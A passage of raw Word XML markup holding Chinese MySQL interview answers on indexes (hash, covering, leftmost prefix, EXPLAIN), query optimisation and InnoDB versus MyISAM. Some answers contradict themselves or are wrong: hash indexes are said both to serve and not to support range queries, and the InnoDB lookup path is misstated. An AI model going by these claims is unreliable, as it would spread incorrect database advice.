          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>UUId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>（随机</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>）作为主键，使数据存储稀疏，这就会出现聚簇索引有可能有比全表扫面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更慢所以建议使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>auto_increment</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>作为主键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3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>、如果主键比较大的话，那辅助索引将会变的更大，因为辅助索引的叶子存储的是主键值；过长的主键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值，会导致非叶子节点占用占用更多的物理空间</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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谈谈你对哈希索引的理解？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哈希索引是一种高效的数据结构，用于快速查找和定位数据。它通过将每个数据项映射到一个固定大小的桶中来实现快速访问。哈希索引通常用于实现关系型数据库中的快速查询操作，如等值查询和范围查询。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哈希索引中，每个数据项都被映射到一个唯一的哈希值，这个哈希值对应一个桶。桶中存储着数据项的地址或指针，这样就可以快速访问和定位数据。哈希索引的查询效率非常高，因为它的查找时间复杂度是O(1)，即与数据的规模无关。</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然而，哈希索引也存在一些缺点。首先，哈希冲突是一个比较严重的问题。由于不同的数据项可能会映射到同一个桶中，因此需要解决哈希冲突的方法。其次，哈希索引只支持等值查询，而不支持范围查询。最后，哈希索引需要占用较大的内存空间，因为需要为每个数据项分配一个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总之，哈希索引是一种高效的数据结构，可以用于快速访问和定位数据。在实现时需要解决哈希冲突等问题，并根据具体的应用场景选择合适的索引类型。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17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谈谈你对覆盖索引的认识？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覆盖索引是一种利用数据库索引优化查询性能的方法。它的原理是通过在索引中包含所有需要的查询字段，从而避免了数据库的回表操作，从而提高了查询效率。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在普通的索引中，当查询条件中包含非索引字段时，数据库需要进行回表操作，即通过索引查找到对应的行，再通过行指针去查找相应的数据。这个过程会消耗大量的时间和资源，降低查询效率。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而在覆盖索引中，索引本身包含了所有需要的查询字段，因此可以直接从索引中获取所需数据，避免了回表操作。这样，查询效率将得到极大的提高，特别是在大数据量和高并发的情况下。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覆盖索引并不适合所有的查询场景，只有在查询结果只需要索引字段时才会有效。此外，覆盖索引可能会占用更多的磁盘空间，因为需要在索引中保存更多的数据。因此，在选择是否使用覆盖索引时，需要权衡其对查询性能和存储空间的影响，并根据具体的应用场景进行选择。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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索引的分类？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MySQL的索引包括普通索引、唯一性索引、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="25BB9B"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="none"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="25BB9B"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="none"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://hd.nowcoder.com/link.html?target=https://so.csdn.net/so/search?q=%E5%85%A8%E6%96%87%E7%B4%A2%E5%BC%95&amp;amp;spm=1001.2101.3001.7020" \t "https://www.nowcoder.com/discuss/_blank" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="25BB9B"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="none"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="7"/>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="25BB9B"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="none"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>全文索引</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="25BB9B"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="none"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>、单列索引和空间索引等。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从功能逻辑上说，索引主要有4类，分别是普通索引、唯一索引、主键索引、全文索引。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按照物理实现方式，索引可以分为2种：聚簇索引和非聚簇索引。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按照作用字段个数进行划分，分成单列索引和联合索引。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 xml:space="preserve">按照数据结构：hash索引、BTREE索引 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17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谈谈你对最左前缀原则的理解？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最左前缀原则是数据库索引的一项基本原则。它指的是对于一个复合索引，在查询时只有使用最左边的索引列，才能充分利用该索引。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具体来说，如果一个复合索引包含多个索引列，例如 (a, b, c)，那么只有在查询条件中使用了该索引的最左边的索引列，即 a，该索引才会被充分利用。如果查询条件只使用了 b 或 c，那么该索引就无法被充分利用，需要进行全表扫描。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最左前缀原则的原理是基于 B+ 树索引结构的特点。在 B+ 树中，同一层级的节点是按照索引列的顺序排列的，而且只有最左边的节点是唯一的，后面的节点可能不唯一。因此，只有在查询条件中使用了最左边的索引列，B+ 树才能快速定位到需要的节点，从而充分利用该索引。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最左前缀原则并不是绝对的规则。在某些情况下，如果查询条件中使用了非最左边的索引列，也可能会利用到该索引，特别是在使用覆盖索引或者是包含所有索引列的查询场景下。但是，这种情况下索引的效率通常会比最左前缀场景下低，因为需要遍历更多的索引节点。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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怎么知道创建的索引有没有被使用到？或者说怎么才可以知道这条语句运行很慢的原因?</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要确定一个索引是否被查询使用，你可以通过检查数据库中的执行计划来确定。</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执行计划是数据库在执行查询时生成的一种指令集，用于描述数据库在执行查询时将采取的步骤。执行计划通常可以在大多数数据库管理系统（DBMS）中使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="32CA99"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="EEFAF7"/>
        </w:rPr>
        <w:t>EXPLAIN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="32CA99"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="EEFAF7"/>
        </w:rPr>
        <w:t>EXPLAIN PLAN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>语句来获取。</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当你运行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="32CA99"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="EEFAF7"/>
        </w:rPr>
        <w:t>EXPLAIN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="32CA99"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="EEFAF7"/>
        </w:rPr>
        <w:t>EXPLAIN PLAN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>语句时，数据库会返回一个描述查询执行计划的结果集。这个结果集将描述查询的每个步骤，以及它们执行的顺序和所需的成本。如果查询使用了索引，你应该能够在执行计划中看到相关的信息。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除了执行计划，你还可以使用数据库系统的性能监控工具来诊断查询运行缓慢的原因。这些工具可以提供关于CPU、内存、磁盘和网络使用情况的详细信息，并且可以帮助你确定查询执行的瓶颈所在。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例如，在MySQL中，你可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="32CA99"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="EEFAF7"/>
        </w:rPr>
        <w:t>SHOW PROCESSLIST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>命令来查看当前正在运行的查询和它们的状态。如果一个查询正在运行很长时间，你可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8"/>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="32CA99"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="EEFAF7"/>
        </w:rPr>
        <w:t>EXPLAIN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:color="auto" w:sz="0" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>命令来查看执行计划并确定是否有任何索引未被使用。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总的来说，了解查询的执行计划和使用性能监控工具是诊断查询性能问题的两个重要方法。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17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什么情况下索引会失效？即查询不走索引？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（1）对列进行计算或者是使用函数，则该列的索引会失效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（2）不匹配数据类型，会造成索引失效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（3）where语句中使用了IS NULL或者IS NOT NULL，会造成索引失效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（4）使用了反向操作，该索引将不起作用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（5）.like查询是以%开头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（6）在WHERE中使用OR时，有一个列没有索引，那么其它列的索引将不起作用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注意：要想使用or，又想让索引生效，只能将or条件中的每个列都加上索引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（7）.如果mysql估计使用全表扫描要比使用索引快,则不使用索引</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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查询性能的优化方法？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查询性能的优化是数据库调优的重要部分，以下是一些常见的优化方法：</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创建索引：索引可以加速查询操作，提高查询性能。应该根据具体情况，创建合适的索引，以支持常用查询。</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减少查询返回的数据量：只查询需要的数据，而不是返回整个数据表中的所有数据。可以使用SELECT语句中的WHERE子句和LIMIT关键字来限制返回的数据量。</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使用连接查询：连接查询可以使用多个表中的数据，而不需要进行子查询，这通常比使用子查询更快。如果有多个表需要使用，请使用连接查询。</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避免使用SELECT *：使用SELECT语句中列名的列表，而不是使用SELECT *，以避免返回不必要的列。</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减少使用函数：在查询中尽量减少函数的使用，特别是对数据进行函数操作，例如使用LOWER函数来转换字符串大小写。这些操作会导致全表扫描，从而降低查询性能。</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使用索引覆盖查询：使用索引覆盖查询可以避免对数据表的全表扫描，提高查询性能。如果查询的列已经在索引中存在，那么可以使用索引覆盖查询。</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避免使用OR语句：在查询条件中避免使用OR语句，因为它可能会导致查询执行计划的变化，从而降低查询性能。</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优化数据库的配置：通过调整数据库的配置参数，例如缓存大小、最大连接数等，可以提高数据库的性能。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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定期清理无用的数据：删除不再使用的数据，可以减少数据表的大小，从而提高查询性能。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以上是一些常见的查询性能优化方法，实际应用中还需要根据具体情况进行优化</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18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InnoDB 和 MyISAM 的比较？</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MyISAM</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不支持事务，但是每次查询都是原子的；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支持表级锁，即每次操作是对整个表加锁；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存储表的总行数；</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一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>MYISAM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>表有三个文件：索引文件、表结构文件、数据文件；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采用非聚集索引，索引文件的数据域存储指向数据文件的指针。辅索引与主索引基本一致，但是辅索引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不用保证唯一性。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InnoDb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>：</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支持</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ACID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的事务，支持事务的四种隔离级别；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支持行级锁及外键约束：因此可以支持写并发；</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不存储总行数；一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>InnoDb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>引擎存储在一个文件空间（共享表空间，表大小不受操作系统控制，一个表可能分布在多</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个文件里），也有可能为多个（设置为独立表空，表大小受操作系统文件大小限制，一般为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>2G</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>），受操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作系统文件大小的限制；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主键索引采用聚集索引（索引的数据域存储数据文件本身），辅索引的数据域存储主键的值；因此从辅</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索引查找数据，需要先通过辅索引找到主键值，再访问辅索引；最好使用自增主键，防止插入数据时，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1"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="single" w:color="DDDDDD" w:sz="2" w:space="0"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
